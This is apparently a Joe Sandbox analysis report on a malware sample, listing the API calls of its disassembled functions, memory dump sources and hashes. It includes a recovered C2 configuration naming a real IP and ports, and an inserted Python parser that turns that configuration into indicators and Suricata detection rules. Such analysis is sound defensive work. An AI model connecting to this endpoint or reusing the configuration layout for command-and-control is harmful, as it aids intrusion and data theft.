                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6C3A1387,?,6C3AA281,6C3A07FB,00000000,6C3A07FB,00000000), ref: 6C3A1A91
                                                                                            • GetLastError.KERNEL32(?,6C3A1387,?,6C3AA281,6C3A07FB,00000000,6C3A07FB,00000000,00000000,?,6C3AB0A5,00000000,00000000,6C3AAFE2,6C3A07FB,00000000), ref: 6C3A1AB7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID:
                                                                                            • API String ID: 442123175-0
                                                                                            • Opcode ID: a6c79c76d1f828934594fc46fbda7085362bdd7a5b487ef8b2080f9555efc4b8
                                                                                            • Instruction ID: cf469436d69901c19bd0f3447a9bf161771a047ed4bec3c2bc2a9e8c564f6ba5
                                                                                            • Opcode Fuzzy Hash: a6c79c76d1f828934594fc46fbda7085362bdd7a5b487ef8b2080f9555efc4b8
                                                                                            • Instruction Fuzzy Hash: 3B21D131A11258DFCB19CF69CC80ADAB7BAEB49305F1441AAE906D7351D730DE46CF61
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6C381124
                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C38115F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFileIos_base_dtorstd::ios_base::_
                                                                                            • String ID:
                                                                                            • API String ID: 2738015347-0
                                                                                            • Opcode ID: 57576b43aa49c8e9619939d247be880536b9334e7a293e54a1be974fbd92addc
                                                                                            • Instruction ID: 28893cb7df3a97a72b4f850c52edd963b810e323d529942b376c42aea3424255
                                                                                            • Opcode Fuzzy Hash: 57576b43aa49c8e9619939d247be880536b9334e7a293e54a1be974fbd92addc
                                                                                            • Instruction Fuzzy Hash: F0314975611B009FE724CF28C845B86BBE5FB49724F008A1CE5AA8B791C771F944CF91
                                                                                            APIs
                                                                                            • __RTC_Initialize.LIBCMT ref: 6C38CF69
                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 6C38CF83
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                            • String ID:
                                                                                            • API String ID: 2442719207-0
                                                                                            • Opcode ID: 5448dbffc7bbd35da002696cf49264a5f0997d4db036bfaa14897aba0c0a3734
                                                                                            • Instruction ID: e52f0683f1695332e4c890d169447f5109937d055bbf104d394adc546befe47c
                                                                                            • Opcode Fuzzy Hash: 5448dbffc7bbd35da002696cf49264a5f0997d4db036bfaa14897aba0c0a3734
                                                                                            • Instruction Fuzzy Hash: 9D21D573A0B2569BDB00BFB8B4007DD77B4EB0671DF10861BE08096F81DB7595058F66
                                                                                            APIs
                                                                                            • send.WS2_32(?,?,00040000,00000000), ref: 034E3291
                                                                                            • send.WS2_32(?,?,?,00000000), ref: 034E32CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: send
                                                                                            • String ID:
                                                                                            • API String ID: 2809346765-0
                                                                                            • Opcode ID: 99fca322e1a700657814ec646a40b173799473c6d778bd336f3dbcce07f03334
                                                                                            • Instruction ID: 2df885476b435f795ce04f701e235a7ca0fd750e630f9c95a4c388e04419b838
                                                                                            • Opcode Fuzzy Hash: 99fca322e1a700657814ec646a40b173799473c6d778bd336f3dbcce07f03334
                                                                                            • Instruction Fuzzy Hash: D911E57AB01304ABC721CE6BDC88B5BB799FB81365F148067F988DF280D27199419658
                                                                                            APIs
                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,?,00008000,6C37BBBA,00008000,6C3A07FB,?,?,?,6C39FD04,6C3A07FB,?,00000000,6C37BBBA,?), ref: 6C39FEB8
                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,6C39FD04,6C3A07FB,?,00000000,6C37BBBA,?,00000000,00008000,6C3A07FB,?,?,6C3A9C04), ref: 6C39FEC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer
                                                                                            • String ID:
                                                                                            • API String ID: 2976181284-0
                                                                                            • Opcode ID: 50a3723a3d30523646b9ca8d43386dcdf7f699b9ff9d5315a6f78bbd6eea7a5c
                                                                                            • Instruction ID: 9c4e70e89692a5efc3b33568fc2f5b7f09c7b868814b0470fe527aa5d5567134
                                                                                            • Opcode Fuzzy Hash: 50a3723a3d30523646b9ca8d43386dcdf7f699b9ff9d5315a6f78bbd6eea7a5c
                                                                                            • Instruction Fuzzy Hash: 8501D632A14655AFCF058F59CC0989E3B79DF86374B240248F8119B6D1F672DD51CFA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: SleepTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 346578373-0
                                                                                            • Opcode ID: ec0629df6995d67ec7547a862065d3f080f68fd9b0fe6479acf76e43a1939410
                                                                                            • Instruction ID: 089b2587dc0e8d1ba51f887a816a2020b3942cb8be198726b0444c3b90d7886c
                                                                                            • Opcode Fuzzy Hash: ec0629df6995d67ec7547a862065d3f080f68fd9b0fe6479acf76e43a1939410
                                                                                            • Instruction Fuzzy Hash: BE01D439200206AFD312DF69C8C8B7EF7A5FB59302F18426AD1044B290C731A9C6CBD5
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: SleepTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 346578373-0
                                                                                            • Opcode ID: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                                                                            • Instruction ID: 27fac5dcdbeed923c3366fb10e8a319fa95706dbc2a1d72b4a6ad2049d896b26
                                                                                            • Opcode Fuzzy Hash: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                                                                            • Instruction Fuzzy Hash: B501DF31A00206AFE302DF65C8C4BABB3F9FB99381F108624D1018B294C771ADD6C7E1
                                                                                            APIs
                                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,034EE04E,00000000,034E9800,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034ECD1B
                                                                                            • _free.LIBCMT ref: 034ECD56
                                                                                              • Part of subcall function 034E1280: __CxxThrowException@8.LIBCMT ref: 034E1290
                                                                                              • Part of subcall function 034E1280: DeleteCriticalSection.KERNEL32(00000000,034ED3E6,03506624,?,?,034ED3E6,?,?,?,?,03505A40,00000000), ref: 034E12A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                            • String ID:
                                                                                            • API String ID: 1116298128-0
                                                                                            • Opcode ID: 6058a9e21bacb8a9521628b6b69abc302ef3ab7ff74d255d3a681fc9d0e65d76
                                                                                            • Instruction ID: 1181dca282f0c789feee965d3b6cd5db126e6bbbf0f31d94177dc2bbabbc4ed4
                                                                                            • Opcode Fuzzy Hash: 6058a9e21bacb8a9521628b6b69abc302ef3ab7ff74d255d3a681fc9d0e65d76
                                                                                            • Instruction Fuzzy Hash: 76017EB0A00B408FC330DF6A9884A17FAE8BF98701B104A1FD2DACAB20D375A506CF55
                                                                                            APIs
                                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,10005AF2), ref: 1000642B
                                                                                            • _free.LIBCMT ref: 10006466
                                                                                              • Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
                                                                                              • Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                            • String ID:
                                                                                            • API String ID: 1116298128-0
                                                                                            • Opcode ID: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                                                                            • Instruction ID: d75aab6d42964042dd9719b22c7254e4122bf8c787039a32894d973a0e8f9c7d
                                                                                            • Opcode Fuzzy Hash: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                                                                            • Instruction Fuzzy Hash: D6017EF4A00B408FD321CF6A8884A47FAF9FF98750B104A1EE2DAC7A10D770A545CF55
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,00000000,034EDF10,00000000,00000000,00000000), ref: 034EE49B
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,034F1168,?,?,?,?,?,?,03506298,0000000C,034F1210,?), ref: 034EE4A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateObjectSingleThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 1891408510-0
                                                                                            • Opcode ID: 23c9603334f8c7cc7935502a99e0de74686a78cde0f14afa64dffc01ff2f247a
                                                                                            • Instruction ID: cfc9b961b0f74a81a67f0d0f5f8bb77733db7c0ce8fa8157ad3de51c82f96790
                                                                                            • Opcode Fuzzy Hash: 23c9603334f8c7cc7935502a99e0de74686a78cde0f14afa64dffc01ff2f247a
                                                                                            • Instruction Fuzzy Hash: 6BE05BB2444209BFDF10FB54EC88E3B73DCD704335B104756BA24C6369E5719985AA64
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 034EF98F
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                              • Part of subcall function 034EF964: __getptd_noexit.LIBCMT ref: 034EF969
                                                                                              • Part of subcall function 034EF964: __freeptd.LIBCMT ref: 034EF973
                                                                                              • Part of subcall function 034EF964: ExitThread.KERNEL32 ref: 034EF97C
                                                                                            • __XcptFilter.LIBCMT ref: 034EF9B0
                                                                                              • Part of subcall function 034F418F: __getptd_noexit.LIBCMT ref: 034F4195
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                            • String ID:
                                                                                            • API String ID: 418257734-0
                                                                                            • Opcode ID: 7e533bb9f64c489b5b6b7686450e3c26a8d21f53d572c8a21486e2386f2cef5c
                                                                                            • Instruction ID: 43b0e97b00116b46ea4d4351c5b6da764b0d6dfec60259209c3421dcec8acd8e
                                                                                            • Opcode Fuzzy Hash: 7e533bb9f64c489b5b6b7686450e3c26a8d21f53d572c8a21486e2386f2cef5c
                                                                                            • Instruction Fuzzy Hash: 4BE08CB8900300EFDB18FBA2D804E3E3734EF04602F20014EE2016F2A0CF399800DA24
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 10007181
                                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                                              • Part of subcall function 10007156: __getptd_noexit.LIBCMT ref: 1000715B
                                                                                              • Part of subcall function 10007156: __freeptd.LIBCMT ref: 10007165
                                                                                              • Part of subcall function 10007156: ExitThread.KERNEL32 ref: 1000716E
                                                                                            • __XcptFilter.LIBCMT ref: 100071A2
                                                                                              • Part of subcall function 10009C41: __getptd_noexit.LIBCMT ref: 10009C47
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                            • String ID:
                                                                                            • API String ID: 418257734-0
                                                                                            • Opcode ID: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                                                                            • Instruction ID: 91050fa4c4edb40f5b5d990f834f761f3b027d6385ed46559f27b3ea4901cb17
                                                                                            • Opcode Fuzzy Hash: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                                                                            • Instruction Fuzzy Hash: 76E0ECB9904604DFF718DBA0C956E6E7775EF44241F210049F1015B2A6CB35B940DB24
APIs
• __lock.LIBCMT ref: 034F641B
  • Part of subcall function 034F8E5B: __mtinitlocknum.LIBCMT ref: 034F8E71
  • Part of subcall function 034F8E5B: __amsg_exit.LIBCMT ref: 034F8E7D
  • Part of subcall function 034F8E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,034F3F06,0000000D,03506340,00000008,034F3FFF,00000000,?,034F10F0,00000000,03506278,00000008,034F1155,?), ref: 034F8E85
• __tzset_nolock.LIBCMT ref: 034F642C
  • Part of subcall function 034F5D22: __lock.LIBCMT ref: 034F5D44
  • Part of subcall function 034F5D22: ____lc_codepage_func.LIBCMT ref: 034F5D8B
  • Part of subcall function 034F5D22: __getenv_helper_nolock.LIBCMT ref: 034F5DAD
  • Part of subcall function 034F5D22: _free.LIBCMT ref: 034F5DE4
  • Part of subcall function 034F5D22: _strlen.LIBCMT ref: 034F5DEB
  • Part of subcall function 034F5D22: __malloc_crt.LIBCMT ref: 034F5DF2
  • Part of subcall function 034F5D22: _strlen.LIBCMT ref: 034F5E08
  • Part of subcall function 034F5D22: _strcpy_s.LIBCMT ref: 034F5E16
  • Part of subcall function 034F5D22: __invoke_watson.LIBCMT ref: 034F5E2B
  • Part of subcall function 034F5D22: _free.LIBCMT ref: 034F5E3A
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
• String ID:
• API String ID: 1828324828-0
• Opcode ID: b5c9a24cd56a303b2a1e8f69340c6dda497c405d57a366cb505c071dd8698154
• Instruction ID: ae201afbdb30873188c4e0b16d4afe97a0e81b425811b4d084db00972ef7dabc
• Opcode Fuzzy Hash: b5c9a24cd56a303b2a1e8f69340c6dda497c405d57a366cb505c071dd8698154
• Instruction Fuzzy Hash: E6E0C238941B10DEC622FBE6B102A0F7220AB80F21F5C414FEB405F2E4CF304182E69E
APIs
• lstrlenW.KERNEL32(|p1:134.122.155.39|o1:15091|t1:1|p2:134.122.155.39|o2:15092|t2:1|p3:134.122.155.39|o3:15093|t3:1|dd:1|cl:1|fz:), ref: 10004755
  • Part of subcall function 10003260: __wcsrev.LIBCMT ref: 10020655
Strings
• |p1:134.122.155.39|o1:15091|t1:1|p2:134.122.155.39|o2:15092|t2:1|p3:134.122.155.39|o3:15093|t3:1|dd:1|cl:1|fz:, xrefs: 10004750
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: __wcsrevlstrlen
• String ID: |p1:134.122.155.39|o1:15091|t1:1|p2:134.122.155.39|o2:15092|t2:1|p3:134.122.155.39|o3:15093|t3:1|dd:1|cl:1|fz:
• API String ID: 4062721203-1314694870
• Opcode ID: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
• Instruction ID: 3065bb4344b1789bcecd08ba6036c617636919b35652953f12b0e4d8e139a27a
• Opcode Fuzzy Hash: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
• Instruction Fuzzy Hash: EFC08C72208214CFF202E3D4988876D7359EB33722F608039FA00CD012E672CC8097B1
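The wide string passed to lstrlenW above is the only place in this function listing where the sample's C2 configuration appears in the clear: a pipe-separated list of key:value fields naming one IP three times with three consecutive ports. The parser below is an added example written for this report, not code from Joe Sandbox or from the malware; it assumes (the report does not say) that p<n>/o<n>/t<n> are the address, port and a per-endpoint flag of the n-th C2 entry and that dd, cl and fz are global options of unknown meaning. It tolerates attacker-controlled garbage (missing colons, empty values such as `fz:`, non-numeric ports) instead of crashing, and turns the parsed endpoints into a blocklist and Suricata rules an analyst could drop into detection.

```python
"""Parse the pipe-delimited C2 config string recovered from this sample's
memory dump (the lstrlenW argument at 10004755) into structured IOCs.

Assumptions, not stated in the report:
  - fields are '|'-separated 'key:value' pairs;
  - p<n> = address, o<n> = port, t<n> = per-endpoint flag of C2 entry n;
  - dd / cl / fz are global options whose meaning is unknown here.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed from the string shown in the report for this sample.
SAMPLE_CONFIG = ("|p1:134.122.155.39|o1:15091|t1:1"
                 "|p2:134.122.155.39|o2:15092|t2:1"
                 "|p3:134.122.155.39|o3:15093|t3:1"
                 "|dd:1|cl:1|fz:")


@dataclass
class Endpoint:
    index: int
    address: Optional[str] = None
    port: Optional[int] = None
    flag: Optional[str] = None


@dataclass
class C2Config:
    endpoints: List[Endpoint]
    options: Dict[str, str]


def parse_kv(raw: str) -> Dict[str, str]:
    """Split '|k:v|k:v' into a dict. Empty values (e.g. 'fz:') are kept as ''.
    Fields without a colon are skipped, not raised on: the input is
    attacker-controlled and a parser that dies on one bad field is useless."""
    out: Dict[str, str] = {}
    for field in raw.split("|"):
        if not field or ":" not in field:
            continue
        key, _, value = field.partition(":")
        out[key.strip()] = value.strip()
    return out


def parse_config(raw: str) -> C2Config:
    """Group p<n>/o<n>/t<n> keys into numbered endpoints; everything else is
    treated as a global option (assumed layout, see module docstring)."""
    endpoints: Dict[int, Endpoint] = {}
    options: Dict[str, str] = {}
    for key, value in parse_kv(raw).items():
        prefix, digits = key[:1], key[1:]
        if prefix in ("p", "o", "t") and digits.isdigit():
            ep = endpoints.setdefault(int(digits), Endpoint(int(digits)))
            if prefix == "p":
                ep.address = value
            elif prefix == "o":
                ep.port = int(value) if value.isdigit() else None
            else:
                ep.flag = value
        else:
            options[key] = value
    return C2Config([endpoints[i] for i in sorted(endpoints)], options)


def iocs(cfg: C2Config) -> List[str]:
    """Return sorted, de-duplicated 'ip:port' strings for endpoints that have
    a syntactically valid IP and a port in range; hostnames are skipped so the
    output can feed an IP blocklist directly."""
    out = set()
    for ep in cfg.endpoints:
        if ep.address is None or ep.port is None or not 0 < ep.port < 65536:
            continue
        try:
            ipaddress.ip_address(ep.address)
        except ValueError:
            continue
        out.add(f"{ep.address}:{ep.port}")
    return sorted(out)


def suricata_rules(cfg: C2Config, sid_base: int = 9000001) -> List[str]:
    """One outbound TCP alert per C2 endpoint. SIDs in the 9000000+ range are
    a local convention assumed here, not anything from the report."""
    rules = []
    for n, ioc in enumerate(iocs(cfg)):
        ip, port = ioc.rsplit(":", 1)
        rules.append(
            f'alert tcp $HOME_NET any -> {ip} {port} '
            f'(msg:"GhostRat/ValleyRAT C2 from sample config"; '
            f'flow:to_server; sid:{sid_base + n}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    for ep in cfg.endpoints:
        print(f"C2 #{ep.index}: {ep.address}:{ep.port} flag={ep.flag}")
    print("options:", cfg.options)
    print("\n".join(suricata_rules(cfg)))
```

Running the block on the string from this report yields three endpoints on 134.122.155.39 (ports 15091, 15092, 15093, each with t=1) and the global options dd=1, cl=1, fz empty; the same three host:port pairs are what one would expect to see behind the IDS alerts for this sample.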
APIs
• RegCloseKey.ADVAPI32(80000001,034E6E9A), ref: 034E6EC9
• RegCloseKey.ADVAPI32(75BF73E0), ref: 034E6ED2
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: ff09428d3edd81cfea7e0a672576acaf81b56b0260187943e788465d3459c235
• Instruction ID: 6273aee32d17081ad1c61fc55bcee42eea043ae58542c620a56f67ba041bd84f
• Opcode Fuzzy Hash: ff09428d3edd81cfea7e0a672576acaf81b56b0260187943e788465d3459c235
• Instruction Fuzzy Hash: 48C09B72D0113857CF10F7A4FD48D4D77B85F4C110F1144C2A104A3114C634BD45CF90
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,?,6C3A0EE1,6C3A9DDA,?,00000000,00000000), ref: 6C3A0F48
• GetLastError.KERNEL32(?,00000000,?,6C3A0EE1,6C3A9DDA,?,00000000,00000000), ref: 6C3A0F52
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: 1413dfc2a2cd6deb1bce3bf704cf7ead1852f0ef734a695eeb326ed75335670c
• Instruction ID: 4c297581fef781d6c32cbdf648c276b096c1feafcca14a5623498129680c77bb
• Opcode Fuzzy Hash: 1413dfc2a2cd6deb1bce3bf704cf7ead1852f0ef734a695eeb326ed75335670c
• Instruction Fuzzy Hash: 24116F3360C19016C60517F99A4979D376DCB8B73CF250349E92EE7AC0EB32D4678A95
APIs
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C3877F3
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
